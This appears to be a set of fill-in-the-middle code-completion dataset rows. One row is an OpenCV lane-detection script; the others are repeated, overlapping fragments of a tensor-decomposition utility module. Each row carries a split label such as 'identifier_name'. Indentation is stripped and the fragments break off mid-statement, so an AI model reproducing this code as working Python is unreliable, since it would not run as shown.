mag_binary = np.zeros_like(scaled)
mag_binary[(scaled >= mag_thresh[0])&(scaled <= mag_thresh[1])] = 1
return mag_binary
def dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi/2)):
# Calculate gradient direction
# Apply threshold
gray_img = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
sobelx = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobely = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=sobel_kernel)
absx = np.absolute(sobelx)
absy = np.absolute(sobely)
direction = np.arctan2(absy,absx)
dir_binary = np.zeros_like(gray_img)
dir_binary[(direction >= thresh[0])&(direction <= thresh[1])] = 1
return dir_binary
def hls_select(image,thresh=(0,255)):
hls = cv2.cvtColor(image,cv2.COLOR_BGR2HLS)
s = hls[:,:,2]
binary_output = np.zeros_like(s)
binary_output[(s>thresh[0])&(s<=thresh[1])]=1
return binary_output
def equalize(image):
image_yuv = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#image_yuv[:,:,0] = cv2.equalizeHist(image_yuv[:,:,0])
#histo = cv2.calcHist([image_yuv],[0],None,[256],[0,256])
#plt.plot(histo)
#plt.show()
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(20,20))
image_yuv[:,:,0] = clahe.apply(image_yuv[:,:,0])
img_output = cv2.cvtColor(image_yuv, cv2.COLOR_YUV2BGR)
return img_output
def yuv_select_lumin(image,thresh=(0,255)):
yuv_img = cv2.cvtColor(image,cv2.COLOR_BGR2YUV)
lumin = yuv_img[:,:,0]
binary_output = np.zeros_like(lumin)
binary_output[(lumin>thresh[0])&(lumin<=thresh[1])]=1
return binary_output
def hist(img,left_fit1,right_fit1,win=True):
#img = img[:,:,0]/255
img = img/255
img = np.expand_dims(img,axis=-1)
bottom_half = img[img.shape[0]//2:,:]
histogram = np.sum(bottom_half,axis=0)
# out = np.arange(600)
# out1 = np.arange(600,-1,-1)
# out3=np.zeros(79)
# out2=np.concatenate((out, out1, out3))
# out3 = np.expand_dims(out2,axis=1)
histogram = np.multiply(histogram,fin)
#print(img.shape)
out_img = np.dstack((img,img,img))
#print(out_img.shape)
#print(histogram.shape)
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:])+midpoint
nwindows = 9
margin = 100
minpix =50
searchmargin = 100
window_height = np.int(img.shape[0]//nwindows)
nonzero = img.nonzero()
#**Beware y and then x**
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_ids=[]
right_lane_ids=[]
if win:
for window in range(nwindows):
win_y_low = img.shape[0] - (window+1)*window_height
win_y_high = img.shape[0] - (window)*window_height
win_xleft_low = leftx_current - margin
win_xleft_high =leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0),2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0),2)
good_left_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) &(nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low )& (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) &(nonzerox < win_xright_high)).nonzero()[0]
left_lane_ids.append(good_left_inds)
right_lane_ids.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_ids = np.concatenate(left_lane_ids)
right_lane_ids = np.concatenate(right_lane_ids)
except ValueError:
pass
else:
left_lane_ids = ((nonzerox > (left_fit1[0]*(nonzeroy**2) + left_fit1[1]*nonzeroy +
left_fit1[2] - searchmargin)) & (nonzerox < (left_fit1[0]*(nonzeroy**2) +
left_fit1[1]*nonzeroy + left_fit1[2] + searchmargin)))
right_lane_ids = ((nonzerox > (right_fit1[0]*(nonzeroy**2) + right_fit1[1]*nonzeroy +
right_fit1[2] - searchmargin)) & (nonzerox < (right_fit1[0]*(nonzeroy**2) +
right_fit1[1]*nonzeroy + right_fit1[2] + searchmargin)))
leftx = nonzerox[left_lane_ids]
lefty = nonzeroy[left_lane_ids]
rightx = nonzerox[right_lane_ids]
righty = nonzeroy[right_lane_ids]
return histogram,leftx,lefty,rightx,righty,out_img
cap = cv2.VideoCapture('./project_video.mp4')
#cap.set(cv2.CAP_PROP_POS_FRAMES, 1000)
size=(int(cap.get(3)),int(cap.get(4)))
result1 = cv2.VideoWriter('./output_images/project_video.mp4',
cv2.VideoWriter_fourcc(*'MJPG'),
10, size)
#cap = cv2.VideoCapture('./challenge_video.mp4')
left_fit = []
right_fit =[]
prev_left_fit=[]
prev_right_fit=[]
count=0
radoffset=150
prev_left_fit=[]
prev_right_fit=[]
width=0
validation_fails=0
#image_no=0
while(True):
count+=1
ret, image = cap.read()
dist_pickle = pickle.load(open('./camera_cal/matrix.p','rb'))
dst = dist_pickle["dist"]
mtx = dist_pickle["mtx"]
if ret:
ksize = 3
img_undist = cv2.undistort(image,mtx,dst,None,mtx)
final_img = np.copy(img_undist)
#final_img = equalize(final_img)
#cv2.imwrite('D:/Self Driving Car Engineer/Course 4/SampleImages/'+str(image_no)+'.jpg',final_img)
#image_no+=1
gradx = abs_sobel_thresh(img_undist, orient='x', sobel_kernel=ksize, thresh=(52, 238))
grady = abs_sobel_thresh(img_undist, orient='y', sobel_kernel=ksize, thresh=(59, 249))
mag_binary = mag_thresh(img_undist, sobel_kernel=ksize, mag_thresh=(68, 255))
dir_binary = dir_threshold(img_undist, sobel_kernel=ksize, thresh=( | mag_thresh | identifier_name |
|
decomposition_utils.py | Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = | """ | random_line_split |
|
decomposition_utils.py | different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def | create_operands_and_descriptors | identifier_name |
|
decomposition_utils.py | _modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
| logger.info(f"The SVDConfig attribute '{cut | """
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None: | identifier_body |
decomposition_utils.py | _modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
